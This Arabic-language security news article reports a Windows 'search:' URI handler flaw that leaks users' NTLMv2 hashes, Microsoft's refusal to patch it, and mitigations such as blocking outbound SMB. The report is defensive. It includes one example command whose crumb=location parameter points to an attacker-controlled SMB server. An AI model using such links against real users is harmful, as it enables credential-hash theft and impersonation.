كشف باحثون في مجال الأمن السيبراني عن ثغرة مشابهة لتلك التي تم اكتشافها سابقاً في أداة التقاط الشاشة بنظام ويندوز، والتي تسمح بالكشف عن “هاش” NTLMv2 الخاص بالمستخدمين إلى المهاجمين. تكمن هذه الثغرة المكتشفة حديثاً في معالج روابط “search:”، مما يفتح الباب أمام هجمات جديدة تستهدف بيانات اعتماد المستخدمين.
تتيح هذه الثغرة للمهاجم خداع المستخدم للنقر على رابط مصمم خصيصاً، والذي يمكن تضمينه في صفحات الويب أو رسائل البريد الإلكتروني. بمجرد النقر على الرابط، يجبر النظام على الاتصال بخادم يتحكم به المهاجم، مما يؤدي إلى تسريب “هاش” NTLMv2 الخاص بالمستخدم، والذي يمكن استخدامه لاحقاً لتنفيذ هجمات انتحال الهوية.
ثغرة جديدة في معالج روابط “search:” تكشف “هاش” NTLMv2
تأتي هذه الثغرة المكتشفة حديثاً لتسلط الضوء على المخاطر المستمرة المتعلقة بآليات المصادقة القديمة في أنظمة التشغيل. وبالمثل لحالة CVE-2026-33829، التي أثرت على معالج روابط “ms-screensketch:” الخاص بأداة التقاط الشاشة في ويندوز، فإن هذه الثغرة تستغل معالج روابط “search:” لاستخراج معلومات حساسة.
وفقاً لتقرير صادر عن شركة Huntress، والتي كانت أول من نشر تفاصيل الثغرة، فإن المشكلة تكمن في عدم التحقق الكافي من المعلمات التي يتم تمريرها إلى معالج الروابط “search:”. يسمح ذلك للمهاجم بتضمين مسار خادم SMB (Server Message Block) ضمن الرابط، مما يؤدي إلى تفعيل عملية مصادقة NTLM وتسريب “هاش” NTLMv2 الخاص بالمستخدم.
آلية عمل الثغرة وتسريب “هاش” NTLMv2
تعمل الثغرة عن طريق إدخال المستخدم لكيان خبيث، مثل رابط ويب أو بريد إلكتروني، يشتمل على استدعاء لمعالج الروابط “search:” مع معلمة “crumb=location:” تشير إلى خادم SMB يتحكم به المهاجم. على سبيل المثال، يمكن أن يبدو الأمر كالتالي: `start “” “search:query=test&crumb=location:\10.0.1.100share”`.
عند تنفيذ هذا الرابط، يحاول نظام التشغيل الاتصال بالخادم المحدد، مما يؤدي إلى تبادل رسائل NTLM. خلال هذه العملية، يتم تسريب “هاش” Net-NTLMv2 الخاص بالمستخدم إلى المهاجم. هذا الـ “هاش” هو نسخة مشفرة من كلمة مرور المستخدم، ويمكن للمهاجم استغلالها لاحقاً لتجاوز إجراءات المصادقة.
يُذكر أن استخدام معلمة “crumb” لسرقة الـ “هاش” (CVE-2023-35636) قد تم توثيقه سابقاً من قبل شركة Varonis في فبراير 2024. وتشير Huntress إلى أن الثغرة الجديدة تستخدم نفس آلية تسريب NTLM ولها نفس المتطلبات الأساسية، مع تصنيف “متوسط” للخطورة.
رفض مايكروسوفت معالجة الثغرة
وفقاً للتصريحات، قامت Huntress بالإبلاغ عن الثغرة إلى مايكروسوفت في 15 أبريل 2026، كجزء من مبدأ الإبلاغ المسؤول. ومع ذلك، رفضت شركة مايكروسوفت معالجة هذه المشكلة، مشيرة إلى أن “الحالات ذات الخطورة العالية والحرجة فقط هي التي تستوفي معاييرنا للخدمة”.
في ظل عدم وجود تصحيح رسمي، تقدم باحثو الأمن السيبراني توصيات للمؤسسات لحماية نفسها. تشمل هذه التوصيات حظر اتصالات SMB الصادرة (TCP/445 و TCP/139) على الأجهزة التي لا تحتاج إليها، وفرض توقيع SMB لضمان عدم إمكانية استخدام الـ “هاش” المسروق ضد الخدمات الداخلية، وتعطيل NTLM حيثما أمكن.
من المهم التأكيد على أن الاهتمام بأمن أحدث إصدارات نظام التشغيل، ومعالجة الثغرات بشكل استباقي، يظل أمراً حيوياً للحفاظ على سلامة البيانات وحماية المستخدمين من التهديدات المتطورة في عالم الأمن السيبراني.